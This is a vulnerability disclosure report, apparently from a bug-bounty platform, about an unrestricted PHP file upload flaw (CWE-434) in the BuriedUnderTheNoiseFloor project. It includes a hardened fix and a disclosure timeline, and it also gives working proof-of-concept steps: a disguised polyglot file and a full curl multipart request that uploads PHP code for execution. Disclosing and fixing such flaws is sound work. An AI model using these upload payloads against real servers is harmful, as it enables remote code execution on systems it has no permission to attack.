Unrestricted Upload of File with Dangerous Type in jspark311/buriedunderthenoisefloor

Valid

Reported on

Oct 13th 2021


Description

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked; the attacker then only needs a way to get that code executed. https://github.com/jspark311/BuriedUnderTheNoiseFloor/ is vulnerable to remote code execution via Unrestricted Upload of File with Dangerous Type (CWE-434), as shown below:

Proof of concept

Vuln variable: $_FILES['upfile']
Snippet:

if (isset($_FILES) && isset($_FILES['upfile'])) {
    if ($_FILES['upfile']['error'] == 0) {
        // 'type' is the Content-Type the client sent for this multipart part: attacker-controlled
        if (in_array($_FILES['upfile']['type'], $allowed)) {
            // extension copied verbatim from the client-supplied filename, never checked
            $extension = end(explode('.', $_FILES['upfile']['name']));
            // stored under the web-served uploads/ directory with that extension
            $file_path  = 'uploads/'.hash('sha256', $_FILES['upfile']['tmp_name'].time()).'.'.$extension;
            if (move_uploaded_file($_FILES['upfile']['tmp_name'], $file_path)) {
                $img = file_get_contents($file_path);
                $state = 1;
                ...

BuriedUnderTheNoiseFloor checks only $_FILES['upfile']['type'], which is the Content-Type the browser (or attacker) sent for the multipart part, and then copies the extension straight from the client-supplied filename without validating it. A file named test2.php with a spoofed image Content-Type therefore passes the check and is written into the web-served uploads/ directory as a .php file, giving remote code execution as shown next:
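A hardened version of the handler, added here as an example and not code from the BuriedUnderTheNoiseFloor project: the MIME type is detected server-side with finfo instead of being read from the client's Content-Type, the extension is assigned from a server-side allow-list rather than copied from the filename, the stored name is random, and the image is decoded and re-encoded through GD so that bytes appended after a real JPEG (the polyglot technique used in Method 1 below) never reach disk. The names $allowed, $upload_dir and store_upload() are this example's own, and it assumes the fileinfo and GD extensions and PHP 8.0 or later (for match). It complements, rather than replaces, disabling PHP execution for the uploads directory on the web server.

```php
<?php
// Added example, not the project's own code. $allowed, $upload_dir and
// store_upload() are names chosen for this example; it assumes the fileinfo
// and GD extensions and PHP >= 8.0 (for match).

// Server-detected MIME type => extension we assign ourselves. The client's
// filename and the Content-Type it sent for the part are never consulted.
$allowed = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
// Directory the web server must be configured not to execute scripts from;
// better still, a path outside the document root served by a read-only script.
$upload_dir = __DIR__ . '/uploads';

function store_upload(array $file, array $allowed, string $upload_dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Refuse anything that did not arrive through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Sniff the bytes instead of trusting $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset($allowed[$mime])) {
        return null;
    }
    // Decode through GD: a non-image fails here, and anything appended after
    // the image data (e.g. a "<?php ... ?>" tail) is not part of the decoded pixels.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    // Random, server-generated name with the extension taken from our own table.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $path = $upload_dir . '/' . $name;
    // Re-encode so only pixel data reaches disk (this also drops EXIF/comment blocks).
    $ok = match ($allowed[$mime]) {
        'jpg'   => imagejpeg($img, $path, 90),
        'png'   => imagepng($img, $path),
        'gif'   => imagegif($img, $path),
        default => false,
    };
    imagedestroy($img);
    return $ok ? $name : null;
}

if (isset($_FILES['upfile'])) {
    $stored = store_upload($_FILES['upfile'], $allowed, $upload_dir);
    $state  = $stored !== null ? 1 : 0;
}
```

The two controls that actually close the reported bug are that the client never chooses the extension and that the destination directory cannot execute scripts; the finfo check and GD re-encoding are defense in depth against polyglot files and should not be relied on alone.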

Payload

Method1:

Generate a valid JPEG image with PHP code embedded at the end of it; for example, in a terminal, decode a base64-encoded image:

echo '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' | base64 -d > test2.php

Select this test2.php file in the upload form.
Intercept the request with a proxy and change the part's Content-Type header to Content-Type: image/jpg.
Go to the uploads directory, http://localhost/BuriedUnderTheNoiseFloor-master/uploads/, and open the newly created .php file (its name is the sha256 value computed by the handler, so this step relies on directory listing being enabled or on otherwise learning the generated name).
Observe that phpinfo() is executed.

Method2:

In a terminal, use curl to send a forged request (a PHP script declared with an image Content-Type). In this example the application is installed at http://localhost/BuriedUnderTheNoiseFloor-master/:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost' \
    -H $'Content-Type: multipart/form-data; boundary=---------------------------13655746569274249392023872903' \
    -H $'Content-Length: 238' \
    -H $'Connection: close' \
    --data-binary $'-----------------------------13655746569274249392023872903\x0d\x0aContent-Disposition: form-data; name=\"upfile\"; filename=\"test2.php\"\x0d\x0aContent-Type: image/jpg\x0d\x0a\x0a<?php phpinfo();?>\x0a\x0d\x0a-----------------------------13655746569274249392023872903--\x0d\x0a' \
    http://localhost/BuriedUnderTheNoiseFloor-master/form.php

Go to the uploads directory, http://localhost/BuriedUnderTheNoiseFloor-master/uploads/, and open the newly created .php file.
Observe that phpinfo() is executed.

Impact

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. Here the file is written to the web-served uploads/ directory with a client-chosen extension, so a .php upload gives arbitrary code execution as the web server user.

We have contacted a member of the jspark311/buriedunderthenoisefloor team and are waiting to hear back 7 months ago
We have sent a follow up to the jspark311/buriedunderthenoisefloor team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the jspark311/buriedunderthenoisefloor team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the jspark311/buriedunderthenoisefloor team. This report is now considered stale. 6 months ago
J. Ian Lindsay
3 months ago

Maintainer


This has been fixed by ensuring the PHP execution policy is disabled for the upload directory on the webserver.

J. Ian Lindsay validated this vulnerability 3 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
J. Ian Lindsay confirmed that a fix has been merged on 404a45 3 months ago
The fix bounty has been dropped